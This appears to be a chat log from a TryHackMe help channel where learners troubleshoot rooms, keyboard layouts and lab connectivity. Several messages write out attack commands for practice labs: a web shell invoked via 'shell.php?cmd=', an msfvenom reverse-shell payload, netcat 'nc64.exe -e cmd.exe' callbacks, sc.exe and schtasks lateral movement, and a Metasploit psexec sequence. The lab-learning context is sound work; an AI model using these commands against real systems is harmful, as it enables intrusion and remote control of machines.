Thanks for the reply!! It still doesn't work unfortunatly. I also believe it is a keyboard mismatch. The problem is I'm not from the US but from Belgium and have a AZERTY (NL/FR) keyboard. I also looked in the menu Terminal - Set Character Encoding - ADD or Remove. But the French option isn't available. Maybe that's the problem, but don't know how to solve that.

Gave +1 Rep to @slim bison (current: #204 - 54)

Yep, that makes sense. The “Set Character Encoding” menu is not the right setting. Encoding controls how text is displayed, not how your keyboard keys are mapped.

This sounds like the Linux VM / AttackBox is using a US keyboard layout while your physical keyboard is Belgian AZERTY.

Try this inside the Linux terminal:

setxkbmap be

Then test the tilde again.

You can check the current layout with:

setxkbmap -query

If be does not feel right, you can list Belgian variants with:

localectl list-x11-keymap-variants be

If this is the THM browser AttackBox, also check the AttackBox side toolbar/settings for keyboard layout. Sometimes the browser VM has its own keyboard mapping separate from the Linux desktop settings.

Also, don’t use Terminal → Set Character Encoding for this. You want Keyboard Layout / Input Source, not character encoding.

hello good morning everyone
Could you help me with something? in the Moniker Link room (CVE-2024-21413) Task 3, I have already made the change to line 12 and line 31 correctly, the email is sent but nothing arrives in the outlook of the victim machine
To make sure I didn't do something wrong:
On line 12 I put 'victim@(ip attacker).thm'
and on line 31 server = smtplib.SMTP('victim ip', 25)
As I said, the email is sent after running the exploit but I end up not receiving anything

Honestly, I'm 1 hour into this and I've already tried several modifications, even changing the machine/IP
as a first choice I preferred to come and ask here rather than google search

I came back a few hours later and managed to find the problem thanks to @heady fractal in #room-bugs on 01/02/2025 thanks hero

Gave +1 Rep to @heady fractal (current: #89 - 126)

Ho bisogno per cortesia, se qualcuno mi può dare queste tre risposte, perché io uso il telefonino e non il pc se qualcuno è disponibile a darmi tre risposte, vi ringrazio moltissimo questi sono le tre risposte Qual è la prima bandiera?

Controllo
Qual è la seconda bandiera?

Controllo
Qual è la terza bandiera?

Controllo

English only please

need help, please. If someone can give me these three answers, I would really appreciate it because I’m using my phone and not a PC. If anyone is available to help me with the three answers, thank you very much. These are the three questions: What is the first flag? Check. What is the second flag? Check. What is the third flag? Check.

Well what room is it?

Cypheron
A collection of insane difficulty challenges available as part of our public 2026: An AI Odyssey CTF event.

Yes, this is the roo

Wait did you just jump into an ctf event, do you have any cyber security background or foundation?

have some experience, I’m in the Gold Shield, but I’m using my phone. In that room it asks me to start the machine, but the machine can only be started with a PC, and I’m using a phone. I can’t start it.

Can I ask why can't you use a computer at the moment?

Because I don’t have one.

Well thats going to be a bit of a tough time then

you are asking to help you cheat during a live CTF event that prohibits this and doing it publicly in a THM channel?? Shocking....

I’m not cheating. I’m honestly using only my phone, and that’s making things difficult. If it looks suspicious, I understand, but that’s not my intention at all. Thanks anyway.

Thank you for your trust.

"give me these three answers" is quite clear to me - why public? this is something you ask your team privately

is anyone having an issue opening AI ctfs through the attack machine? i cant view it from firefox of the attackbox even when i leave the AI to boot up for 10 minutes (last CTF of the vetera easy difficulty)

No, thank you. I don’t want to take anything from anyone. Anyway, thank you for your effort.”

Tried a different browser?

just figured it out, had to specify the port number on the browser

Thank you anyway 🙂

No problem

I gave these commands, it reset the keyboard layout to BE, but still it doesn't accept the tilde. I do know how to type it ~ ~ ~... That's not the problem, only the VM won't display it. It's really odd. I also tried some variants, but doesn't work either. Feeling frustrated ... It's not only the tilde btw, but some other characters also like ^ ù ` é § ç à)

That sounds extra frustrating.

If setxkbmap be reset the Linux keyboard layout and the problem still affects characters like: ~ ^ ù ` é § ç à

then it may not be the Linux layout anymore. It may be the browser-based VM input layer not passing Belgian AZERTY / dead-key characters correctly into the AttackBox.

You may want to reach out to support@tryhackme.com in the meantime as likely will take a few days for response. Meantime, this would be a great thing for AI like GPT, you could copy-paste your screen outputs and describe your issue/results in realtime and likely get you moving forward - best of luck!

I'm very gratefull for your help!! have a great day!

thank you, this was helpful

Gave +1 Rep to @slim bison (current: #203 - 55)

We will not help with the following but not limited to:

• Account hacks/penetration testing
• Blackmailing
• Asking about account restoration
• Game hacks or cheats
• Revenge hacking
• Cyberstalking
• Take down services aka d/ddos attacks
• Etc

We will not risk our own lives to help a stranger get their accounts back or perform tests by using illegal or unethical means. If support or someone is asking you to do this. Please refer them to the rules of this server and or the proper support pages for better help.

I cannot get my Firefox browser to accept the certificate to access the websites for the burpsuite room. I have it listed on there, but it’s still not letting me connect to the http, any ideas? OS is Ubuntu Linux as well.

what is the error message you are getting in your browser? is it actually saying it won't allow the site, or saying you cannot reach the site?

hello new to tryhackme

This worked for me - #room-help message

could possibly be a format issue, or expired cert. Is it actually listed in your settings - under certificate manager?

Yeah it was there when I checked

and OPENVPN is connected to THM? Not questioning your skills here, just throwing out issues I've seen in the past.

Not looking at the room, you aren't able to view any websites, or this there a website tied to the module that you can't visit? proxy in browser set to 127.0.0.1 : 8080?

hello guys

when executing this command in a compromised web server:
http://ip:port/uploads/shell.php?cmd=cd /
it doesn't do anything. However one word commands like ls, hostname, whoami work.

You won't be able to execute a command with a space. Likely need to url encode it. Try cyberchef
https://gchq.github.io/CyberChef/#recipe=URL_Encode(false)

ls -la becomes ls%20-la

I see thank you! But how can I navigate the directory with it

Gave +1 Rep to @cold flower (current: #149 - 75)

that does work however i tried cat%20shell.php or cat%20/ and it didn't work

You cant exactly navigate to a diff directory and stay there then run subsequent commands. It doesn't work that way.
If you're just trying to cat out the php file and it's indeed in the directory you're in, the cat command should work.
What room are you doing?

Actually I have found that just cat%20/pathtofile will read the flag needed for the room I appreciate for the help man

Extending Your Network task6Try sending a TCP packet from computer1 to computer3 to reveal a flag. I have do sendtpackage From computer 1 to computer 3 packet type TCP Data nothing

Goodmorning every one

Guys I am stuck on the room vectara last task. it is supposed to be easy but i dont get what i have to do

I'm on this room: https://tryhackme.com/room/splunkdashboardsandreports

Is it a known issue that you can't seem to create scheduled reports or alerts?

or maybe it's a feature, not a bug 🙃

It's a limitation because those features require splunk enterprise.
The room still walks through the setup though so you can learn how to do it.

yeah, I realised. Thanks 🙂

Gave +1 Rep to @cold flower (current: #145 - 76)

just got a bit confused since the logo says Splunk Enterprise

same 😭
the rest of the tasks seemed like light work compared to this

It's worth setting up on your own VM and not too difficult. There are rooms all about setting up a lab that walk you through the install.
You can get a limited time trial license to test all the features.

Great practice in my opinion 👍

cool, sounds like a plan!

I've been labbing with Azure Sentinel quite a lot lately and just realised that Splunk can do everything I want with a lot more ease 😅 As it seems anyway

I guess it depends on your use case and what kind of experience you're trying to gain. Both are great to know but I'm partial to elastic/kibana. Have you messed with it?

https://tryhackme.com/room/vectara
stuck on task 8 last 5 hors may be 1-7 can be done but this one suck my brain
i forget all my thing

did you complet ??

do some progres get some data but stuck on one point just one step close and gae data but unsrepossive
try it ?=<data>
this ans it show shme data

I am facing a problem with the room SOC metrics. Can anybody help?

??

Nope, it's in the pipeline 😄

Can someone help me join the 'Search Skills' Room please 🙏

yah this one is def a lot harder than the rest

Also stuck on vectara task 8, the attackbox can’t connect to target machine ip, anyone have any suggestions or workarounds? Tried going through openvpn and it times out

WDYM?

u gotta find the correct port, non-standard http port

nmap or similar port scanner on the ip

then use http://10.x.x.x:port# in browser

Thank you going to retry now!

Gave +1 Rep to @remote wraith (current: #3765 - 1)

Can anyone help me with the Wreath network challange?

The problem is even after starting the machine, the network does not show running in the corner.

That is why connecting with the VPN provided with the challange fails because the network is not up by itself.

Any help pls?

help with the last task "protocol drift" of the room vectara

was able to find secret keys but cant figure how to get the flag for hours

similar issues here, got some good progress, but didnt get to flag, finally just moved on to next set of rooms.

@remote wraith hi

@earnest sun Hi

@potent latch cant i buy only a monthly sub? i can only see free and TryHackMe Regular Yearly sub

Yes monthly sub is still available

i cannot see can u dm sir?

Go to the following link and toggle the monthly/yearly button 🙂
https://tryhackme.com/pricing

thank you sir

Gave +1 Rep to @potent latch (current: #1 - 6194)

hello

how can I reach to tryhackme support

I am stucl at the room summit at course soc level 1 at the task sample5.exe

anyone to help or answer

Hello sou brasileiro tou começando agora

Poderiam me ajudar a hachear um jogo online

Tento isso faz algum tempo mais não tive sucesso

Am I allowed to ask for assistance on the last question of the Vectara room? The others were fairly easy to get thru, but this one is posing quite difficult. I've 'discovered' a number of items of interest in the output and I have some theories on what may need to be done, but absolutely nothing feels like it is actually getting me closer to the flag. I've been working on it for hours and hours and I'm pulling my hair out..

Hello, this is an English only server.

Just post your question here and somebody who knows the answer will surely chime in

Oh, sorry.

I am working on the AICTF last question. Do I utilize the Empire and/or starkiller tools?

the easy room

Task 8 on the Vectara, how do we access the AI? I added the IP to the /etc/hosts and still it doesn't go anywhere.

I'm not doing something right lol

Well I'm probably way off lol.

I just needed to drop the s, this cold is really kicking my butt.

this medbay agent sucks

I fell off, but I'm back so I don't waste my subscription

Hi guys I stuck on vectara room last question i got the secret but can't get the flag
Can anyone give hint ?

Any help anyone????

hey folks,
i am currently in Tcpdump: The Basics room and need to work with tcmdump command,
however in the room they have shared non sudo user permission. How to change to root permission.
help!

Hi

anyone?

Hi, i got problem with room: https://tryhackme.com/room/detectingwebddos
Task 5 can not be absolved cause the link was broken: http://localhost:8000/en-US/app/search/search
This Link was established on the Desktop of the VM - as oyu can see here the Task: Open the Splunk instance using the shortcut on the Desktop, or access it directly at http://10.114.139.230:8000

Unable to connect
Firefox can’t establish a connection to the server at 10.114.139.230:8000.

Unable to connect
Firefox can’t establish a connection to the server at localhost:8000.

ip a: 10.114.139.230/18
ss -tuln | grep 8000 -> empty
ps aux | grep -i splunk
root 1083 97.8 2.9 337552 117980 ? Ssl 07:25 79:51 splunkd --under-systemd --systemd-delegate=yes -p 8089 _internal_launch_under_systemd
root 2530 0.0 0.3 135384 15032 ? Ss 07:26 0:00 [splunkd pid=1083] splunkd

No NGINX or Apache2 running - no /var/www ... available ...

Need Help plz - cause i need to clear the room 😛

Could u share the question and room?

Markeshall N. Zawolo here.......Just joining......

did anyone completed the checkmate room?

checkmate new room anyone level 3?

#checkmate message

Haven't done the room myself, but when I checked, it seems to be using the payload generic/shell_reverse_tcp?

How about the non-staged payload?

Also, have you tried resetting the target?

anyone can help me on the room "Checkmate", cant figure out how to solve

?

Hi

no hints for the first 72h iirc

You have to do nmap to find what’s open

Hi
Please, help me?
https://tryhackme.com/room/careersincyber5zy1sk0al?taskNo=1&sharerId=6a08df083b9a4c5e4d59eb84
Task 1
Ans = 3,500000 but it is dont work

I got the drug it has hidden, just gotta get the flag, so I'll check that out.

has anyone solve the last challenge in checkmate, my wordlist has 1.6 million words

I reduces it to 800k

but thats still a lot

after i found the drug, i just wrote myself an Rx for it - that drug will make you forget about the flag and all life's worries

incorrect -please read that section again;)

@manu use cupp

YEAH I got it

finished

Had to use a streak freeze for this one

Hello team, I need to verify my access to the 'Common Linux Privesc' environment.

When I try to log in with the default credentials (user3 / password), I get an authentication error. Could you please provide me with the updated password or the command needed to reset it?

Thank you for your assistance.

Hey everyone I'm having problems with the Linux cli basics.. When I do the find ~ -name mission_brief.txt command it gives me something completely different than the one on the lesson. Can someone tell me what I'm doing wrong, I've tried typing it a little different but still nothing

u could just run it in firefox ig

can you show your output - ill log in to compare find ~ -name mission_brief.txt 2>/dev/null <-- this works

hello guys

guys Nmap Post Port Scans dont have attack box

if you have nmap on your own device it may help

some questions need file on attackbox

so i try open attackbox from other room together and then closed that room

its work that way

HI

need help for tryhackme exploitingad room anyone please

not getting meterpreter...Test connection works from target device to my dvice on same port but not getting meterpreter...

@wispy comet mods and staffs need help

@slim bison thank you I'll try that when I get home.

Gave +1 Rep to @slim bison (current: #195 - 57)

I got it working

👍

guys im trying to subscribe thm but this thing shows up everytime
We are unable to authenticate your payment method. Please choose a different payment method and try again.

Reach out to support on the email below

Can you provide a room link please 🙂 ?

@austere dagger following the CVE from Blaster room, in no way I get the pop up option to save the certificate somewhere on the pc, but rather the web page cannot load (not internet connection, I know), so I cannot really continue following this exact vulnerability. Is anyone facing the same issue?

It worked on machine restart

hello

hello guys i need help on a
Snapped Phish‑ing Line task Let’s check if the attacker left any files exposed on the same website.
Navigate to the /data directory.
What is the name of the archive file? how do i proceed

i don't know if you found the answer but add /data in the url like this: example.com/data

guys have something that we can add in msvenom to let the payload more stealth ? any addictional parameter

Hey, I'm stuck on the Lateral Movement and Pivoting room (https://tryhackme.com/room/lateralmovementandpivoting) and could use some help.

Connected via SSH using credentials from http://distributor.za.tryhackme.com/creds:

ssh za\<random_user>@thmjmp2.za.tryhackme.com

I used the sc.exe method to move laterally to THMIIS. Generated my payload, had to explicitly set x64, otherwise msfvenom defaults to x86 and the service fails with error 1053

msfvenom -p windows/x64/shell/reverse_tcp -f exe-service LHOST=<MY_IP> LPORT=4009 -o my_service.exe

Uploaded it to THMIIS's ADMIN$ share:

smbclient -c 'put my_service.exe' -U t1_leonard.summers -W ZA '//thmiis.za.tryhackme.com/admin$/' <Password>

Spawned a shell with t1_leonard' access token:

runas /netonly /user:ZA.TRYHACKME.COM\t1_leonard.summers "c:\tools\nc64.exe -e cmd.exe <MY_IP> 4010"

Set up the listener and created/started the remote service from that shell:

sc.exe \\thmiis.za.tryhackme.com create Potatoes_Service binPath= "%windir%\my_service.exe" start= auto
sc.exe \\thmiis.za.tryhackme.com start Potatoes_Service

Got a reverse shell on THMIIS, but when I tried to grab the flag I got:

Sorry! You are still missing something. No flag for you yet. (7)
I also tried with scheduled tasks :

schtasks /s \\thmiis.za.tryhackme.com /RU "SYSTEM" /create /tn "AnotherTask" /tr "c:\tools\nc64.exe -e cmd.exe <MY_IP> 9999" /sc ONCE /sd 01/01/1970 /st 00:00
schtasks /s \\thmiis.za.tryhackme.com /run /TN "AnotherTask"

Also got a shell, but still couldn't get the flag, different error code this time though (No flag for you yet (6).

I even retried everything by SSHing directly as t1_leonard.summers to stay as close as possible to the assumed breach scenario mentioned in the room.

I don't see any requirement in the room about a specific service or exe name to use. I'm probably missing something obvious. Does anyone know what's needed to actually get the flag?

sorry for the flood, had to give a proper rundown of where I'm at 😅

I still study

Hello everyone
How can I find my discoard token

Yes. Go to the tryhackme site
https://tryhackme.com/manage-account/account-details
Here scroll down, you will find discord token.

hi helo.. i'm stuck at Splunk 2 (BOTS ) room's 400 series question's 4th question. https://tryhackme.com/room/splunk2gcd5 after spending hours i managed to paste it but its not accepting! i have tried third party tools like cyberchef or other online/offline unicode unescape tools. i even have tried changing my keyboard to korean. nothing helps

hlo hlo hlo

I need help regarding exploiting ad room task 5...Dont know why meterpreter shell isnt connecting back..tried test conenction from target device to mine..Its fine connection is coming but when I run shell nothing happens dont know why

I had followed exactly the same config as mentioned in the task description......

@hasty hazel and other mods at least review once

are your options configured correctly

can you show us

and a link to the room perchance

and any error you are getting

etc

we need a bit more info

i cant access the room since its premium..

@deep vessel

if you share the above info, im sure we can help

current state of meterpreter.

https://github.com/rapid7/metasploit-framework/discussions/18785

this looks like you are connected right?

also your lhost, shouldnt that be an IP

its been a while since i used metasploit

yes I am connected using passthe hash...the task require us to get meterpreter from here....for keylogging...

check the listening on ..it shows ip address...I had confirmed it using show options ip address of vpn will be used as my exploitad int will have this ip.

msfconsole
use exploit/windows/smb/psexec
set LHOST 10.50.11.32
set RHOST 10.200.60.201
set SMBUser trevor.local
set SMBShare C$
set SMBPass :
run

can you try with something like this?

lemme try creating new shell with this then..

this what i found in a walkthrough for the room

did you configure both rhost and rport?

or at least configure rhost

aka remote host

it looks like you only configured your local host

Heya guys

Can someone teach me hacking in mobile

you want to hack on mobile?

Yep

#start-here has some great resources, but its better to do this on a laptop or computer. just works a bit better

I don't have them😅

Do you have a background in IT ?

or experience

Nah I'm new to this stuff

then start with that

learn how windows works, how networking works

how linux works

active directory

a programming language

etc

Hi guys, I am current in the Active Directory Basics room but i currently have challenge with task 4 which is "managing users in AD". I saw in the demonstration image attach to the task the instructor login in as Phillip using the Power shell but i have tried all possible means to login in as phillip in the machine in the split screen section by the right hand side but i am unable to do so.

what i have tried so far: 1. i tried loggin in as phillip in th e power shell but it is now allowing to do so . 2. i logout of the machine but it is not allowing me to login as phillip

i will appreciate any help to get past this , thanks in advance .

Did you use rdp or only powershell to connect to philip.Need to use rdp to conenct to philip and from there access powershell...Also its this task probably where wont be able to login as sphie if we change password so be careful regarding that..

i am using only power shell

try using rdp..I believe that creds are for rdp..dont forget to add doain ..

thank you very much i really appreciate your input

Gave +1 Rep to @deep vessel (current: #3769 - 1)

just curious, can i rdp using the machine on tryhackme website ?

or i need to rdp from my own personal machine

yes you can..but I felt that laggy .. so I use from my own device

oh thanks

Gave +1 Rep to @deep vessel (current: #2448 - 2)

i tried using RDP on the machine on tryhackme it does not work

you mean you tried doing rdp from attackbox or you rdp the attackbox itself?

i am not using the attackbox i am using the other machine on tryhackme which is the window AD basic V3

that is, i tried to RDP from the window AD basic V3 machine

make sure to include domain..

@slim bison I tried what you suggested but it's still coming out different then what's on the lesson

thank you very much for the help

Gave +1 Rep to @deep vessel (current: #1847 - 3)

Hello people!
I'm stuck in gobuster room, trying to pass it through my kali machine
I've installed dnsmasq and added the nameserver according to my machine IP, but can't succeed to enumerate the objective
I obviously have a stable connection to thm servers with openVPN

any sugestions?

Thx in advanced

please show your output,what you are expecting it to be versus what you are getting - when i did it, it solved the question in the task

whole gobuster output?
[+] Url: http//www.offensivetools.thm
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.8.2
[+] Timeout: 10s

Progress: 0 / 1 (0.00%)
2026/05/18 11:37:27 error on running gobuster on http//www.offensivetools.thm/: unable to connect to http//www.offensivetools.thm/: Get "http//www.offensivetools.thm/": unsupported protocol scheme ""

I can't seem to expose the expected output since I guess it's part of the answer
I've been prompted to change the /etc/hosts config. I haven't givin it a try though

Sorry I just noticed it does solve the question but I was expecting to get the same redacted msg but that only to not say the answer to the question. Smh, Sorry about that.

wups thouht it was meant for me sry

try removing the www also please enclose term output in backticks like this - where is your command? also ping the target using the domain name and the ip

i've tried both ways
gobuster dir -u "http://offensivetools.thm" -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
and
gobuster dir -u "http://www.offensivetools.thm" -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

even after adding nameserver you need to restart network manager..did you do it?

do you mean etc/init.d/dnsmasq restart ??
in such case, it's affirmative

both my machine (the one deployed for the room) and my internal VIP add pings are answering
pinging www.offensivetools.thm or offensivetools.thm give me "name or service not known"

the whole output for cat /etc/resolv-dnsmasq
cat /etc/resolv-dnsmasq nameserver ***
seems a bit different from the room's guidance, since it's lacking a whole "nameserver" line
maybe that could be it

try this (from the Task5) gobuster dns -d offensivetools.thm -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt

i had to download the wordlist from the repo😅
gobuster dns -d offensivetools.thm -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt Incorrect Usage: invalid value "offensivetools.thm" for flag -d: parse error

well i'll give it a rest for today
thank you veyr much

anyone knoe the answer to room 3 task 2

Not off the top of my head- u havent even dropped us a link to the lab 😅

can i send a screenshot in dms

Please share here to help others

Hi, I am doing Wirehsark: Traffic Analysis lab from SOC level 1, Network traffic analysis room.
In the nmap scans, 4th question, how do I know which port is open?

Could someone help with the concept behind it?

There are port 67, 68 and 69

I am not able to understand the concept, could you please help.

Hey I just started and I can't seem to get into the labs. I installed OpenVPN, imported it's files, connected it, launched the attack box http://(ip address).p.thmlabs., I've asked AI, All I get are ip google searches. I REALLY want to learn this stuff, but if I can't get to the labs../.there's no point

Nevermind i got it

without giving me the answer, can someone please help me know what language will help me translate this section to get the flag?

Never mind i found it it was right infront of me 😅

need room help with Linux CLI basics

watchu trying to figure out?

ubuntu@dull apex:~$ cd Documents
ubuntu@dull apex:~/Documents$ find ~ -name mission_brief.txt
/home/ubuntu/Documents/.research/archive/mission_brief.txt
ubuntu@dull apex:~/Documents$

I'm supposed to find the path to the mission_brief; the room says <redacted-path> instead of .research/archive

so when I type in cd /.research/archive/ it says file not found

so the path is /home/ubuntu/Documents/.research/archive/mission_brief.txt

try "cat /home/ubuntu/Documents/.research/archive/mission_brief.txt"

no such file

not sure about that .research, normally a "." before file means it is hidden, but not sure if that applies to folders / directories. maybe try without the "."

so cat /home/ubuntu/Documents/research/archive/mission_brief.txt

ya should, that's what the room says and tha'ts what AI is saying but it's not working that way

@grand star Please slow down. Further spam will result in a short timeout.

@grand star Please slow down. Further spam will result in a short timeout.

hmmmmm, could try ./home/ubuntu/Documents/.research/archive/mission_brief.txt

ill see if i can check out the room

paid room, don''t have the premium right now........

you could try going one step at a time, if ur in documents, try "cd .research" then "cd archive", then "cat mission_brief.txt"

or "ls" to see which folders are available for you to switch to directly from where you are currently at.

such bullshit

i was in timeout

might help break down the steps a bit to see where the prob is

if I do ls for documents it's logs, notes, reports

can you "cd .research"

I was trying to cut and paste to show you the log and it said I spammed

its hidden so might not show up

cd.research w/" or w/o doesnt owkr

command not found

@grand star Please slow down. Further spam will result in a short timeout.

ls -a supposed to show hidden files

ok

found . .. .researrch logs notes reports

so the next would be cd.research but ....

ok so see if cd .research works, make sure a space between "cd ."